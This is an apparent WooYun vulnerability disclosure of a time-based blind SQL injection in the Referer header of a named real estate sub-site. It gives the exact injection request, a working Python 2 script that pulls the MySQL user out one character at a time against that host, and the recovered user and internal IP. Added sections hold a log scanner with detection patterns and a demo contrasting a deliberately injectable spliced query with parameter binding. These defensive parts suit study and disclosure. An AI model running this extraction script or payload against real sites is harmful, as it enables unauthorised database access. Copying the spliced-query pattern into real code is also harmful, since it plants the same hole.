
Focus Real Estate (focus.cn) sub-site MySQL blind injection (with Python guessing script)

2014-12-17 15:45

Injection point:

```http
GET / HTTP/1.1
Referer: aaa'+sleep(if(ascii(mid(lower(user()),1,1))!=1,5,0))+'bbb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
X-Requested-With: XMLHttpRequest
Host: www.tj.focus.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
```



The Referer header is injectable: a time-based MySQL blind injection.

The HTTP request above is delayed by the sleep() call.
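As an added example (not part of the original report), the following Python 3 script shows what this probe looks like from the defender's side, in a web-server access log: it parses constructed combined-log lines that carry a trailing request-time field, URL-decodes the Referer, and flags the MySQL time-based markers that appear in the payload above, adding the abnormal response time as a second signal. The log format, the field names, the sample lines and the threshold are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed log format: combined log plus an optional trailing request-time
# field (nginx $request_time style). The group names are this example's own.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
    r'(?: (?P<rtime>[\d.]+))?$'
)

# Markers of a MySQL time-based blind probe as seen in the report's payload,
# matched case-insensitively on the URL-decoded header value.
SQLI_MARKERS = {
    "sleep_or_benchmark": re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I),
    "conditional_probe": re.compile(r"\bif\s*\(\s*ascii\s*\(", re.I),
    "user_function": re.compile(r"\buser\s*\(\s*\)", re.I),
    "quote_concat": re.compile(r"'\s*\+"),
}

SLOW_SECONDS = 3.0  # the payload sleeps 5 s; a normal hit on "/" is far below this


def parse_line(line):
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["referer"] = unquote(rec["referer"])  # unquote, not unquote_plus: '+' is literal here
    rec["rtime"] = float(rec["rtime"]) if rec["rtime"] else None
    return rec


def classify(rec):
    """List the reasons a parsed record looks like a time-based blind SQLi probe."""
    reasons = [name for name, rx in SQLI_MARKERS.items() if rx.search(rec["referer"])]
    # Timing alone is weak evidence (slow pages exist); report it only when a
    # syntax marker is also present, as corroboration of the true branch.
    if reasons and rec["rtime"] is not None and rec["rtime"] >= SLOW_SECONDS:
        reasons.append("slow_response")
    return reasons


def scan(lines):
    """Scan log lines; return one dict per suspicious line with ip, referer and reasons."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append({"ip": rec["ip"], "referer": rec["referer"],
                         "rtime": rec["rtime"], "reasons": reasons})
    return hits


# Constructed sample lines (RFC 5737 documentation addresses).
SAMPLE_LINES = [
    # plain payload in the Referer, wrapped in the script's random prefix/suffix; true branch, 5 s
    '203.0.113.7 - - [17/Dec/2014:15:45:01 +0800] "GET / HTTP/1.1" 200 5120 '
    '"0.3713aaa\'+sleep(if(ascii(mid(lower(user()),1,1))=102,5,0))+\'bbb0.1182" '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64)" 5.004',
    # same probe URL-encoded; false branch, normal timing
    '203.0.113.7 - - [17/Dec/2014:15:45:12 +0800] "GET / HTTP/1.1" 200 5120 '
    '"aaa%27%2Bsleep%28if%28ascii%28mid%28lower%28user%28%29%29%2C2%2C1%29%29%3D111%2C5%2C0%29%29%2B%27bbb" '
    '"Mozilla/5.0 (Windows NT 6.1; WOW64)" 0.052',
    # ordinary referer containing the word "if"; must not be flagged
    '198.51.100.9 - - [17/Dec/2014:15:46:30 +0800] "GET /index.html HTTP/1.1" 200 8840 '
    '"http://www.example.com/search?q=if+only" "Mozilla/5.0 (X11; Linux x86_64)" 0.031',
    # no referer, legitimately slow page; must not be flagged on timing alone
    '198.51.100.9 - - [17/Dec/2014:15:47:02 +0800] "GET /report HTTP/1.1" 200 120433 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)" 4.210',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print("%s %s %s" % (hit["ip"], hit["reasons"], hit["referer"][:60]))
```

Run against a real log, the same source address repeating a marker-bearing Referer with alternating slow and fast responses is the shape of the guessing loop in the script below; counting hits per IP is the natural next aggregation.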

Proof of vulnerability:

Guessed the user; there may be false positives. The script was thrown together and is only for verification:

focus_user@192.1.168.62

[screenshot: focus_1.png]



Guessing script attached:

```python
#encoding=utf-8
# Python 2 script (httplib, print statement).
import httplib
import time
import string
import sys
import random
import hashlib

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36'}

# Candidate characters for a MySQL user string: a-z, 0-9, '@', '_' and '.'
payloads = list(string.ascii_lowercase)
for i in range(0, 10):
    payloads.append(str(i))
payloads += ['@', '_', '.']

print '[%s] Start to retrieve MySQL User' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 30):  # position in the user() string
    found = False
    # Note: loops forever once no candidate matches (end of the string).
    while found == False:
        for payload in payloads:
            timeout_count = 0
            for j in range(1, 3):  # 2 times to confirm
                try:
                    # Random prefix/suffix make every Referer value unique (presumably
                    # to avoid cached responses); sleep(5) fires only when the guess is right.
                    referer = str(random.random()) + "aaa'+sleep(if(ascii(mid(lower(user()),{index},1))={char_code},5,0))+'bbb" + str(random.random())
                    headers['Referer'] = referer.replace('{index}', str(i)).replace('{char_code}', str(ord(payload)))
                    # The 4 s socket timeout is shorter than the 5 s sleep, so a
                    # timeout exception is the "true" signal for this guess.
                    conn = httplib.HTTPConnection('www.tj.focus.cn', timeout=4)
                    conn.request(method='GET', url='/', headers=headers)
                    conn.getresponse().read()
                    conn.close()
                    print '.',
                    break
                except Exception, e:
                    timeout_count += 1
                    time.sleep(5)  # wait DB server recover from last query
            if timeout_count == 2:  # timed out both times: character confirmed
                user += payload
                print '\n[In progress] now user is %s' % user
                found = True
                break

print '\nFinally, MySQL user is', user
```

Fix:

Filter the input.
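The report's fix says only "filter". As an added example (not the site's code or the report's), here is the difference between the vulnerable pattern and the robust form of that fix, in Python 3 with sqlite3 standing in for MySQL: one function splices the Referer into the statement the way an injectable site must, the other binds it as a parameter. The table, the assumption that the site stores the Referer, and the function names are this example's own; the payload is the one from the report. SQLite has no sleep()/if()/user(), so for the spliced statement it reports an error naming the injected SQL, which is exactly the evidence that the header text reached the SQL parser; on MySQL that text would execute instead.

```python
import sqlite3

# Constructed schema: assume the site records each hit's Referer (the report does
# not say what query the header reaches, so this table stands in for it).
SCHEMA = "CREATE TABLE visits (id INTEGER PRIMARY KEY, path TEXT, referer TEXT)"

# The Referer value from the report, verbatim.
PAYLOAD = "aaa'+sleep(if(ascii(mid(lower(user()),1,1))!=1,5,0))+'bbb"


def open_db():
    """In-memory SQLite database standing in for the site's MySQL instance."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def log_visit_unsafe(conn, path, referer):
    """Vulnerable pattern: the header text is spliced into the SQL string, so the
    single quote in the payload closes the literal and the rest is parsed as SQL."""
    sql = "INSERT INTO visits (path, referer) VALUES ('%s', '%s')" % (path, referer)
    conn.execute(sql)
    conn.commit()
    return sql


def log_visit_safe(conn, path, referer):
    """Fixed pattern: parameter binding sends the header as data; no character in
    it can change the statement, whatever the value contains."""
    conn.execute("INSERT INTO visits (path, referer) VALUES (?, ?)", (path, referer))
    conn.commit()


def stored_referers(conn):
    """All stored Referer values, in insertion order."""
    return [row[0] for row in conn.execute("SELECT referer FROM visits ORDER BY id")]


def demo_unsafe():
    """Return the error SQLite raises for the spliced statement (it has none of the
    injected functions), or None if the statement unexpectedly succeeded."""
    conn = open_db()
    try:
        log_visit_unsafe(conn, "/", PAYLOAD)
    except sqlite3.OperationalError as e:
        return str(e)
    return None


def demo_safe():
    """With binding, the payload is stored literally and nothing in it is executed."""
    conn = open_db()
    log_visit_safe(conn, "/", PAYLOAD)
    return stored_referers(conn)


if __name__ == "__main__":
    print("unsafe:", demo_unsafe())
    print("safe:  ", demo_safe())
```

Filtering the value is a defence-in-depth layer at best; binding removes the class of bug regardless of which characters the filter happens to know about.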

Source: www.wooyun.org/bugs/wooyun-2014-081727
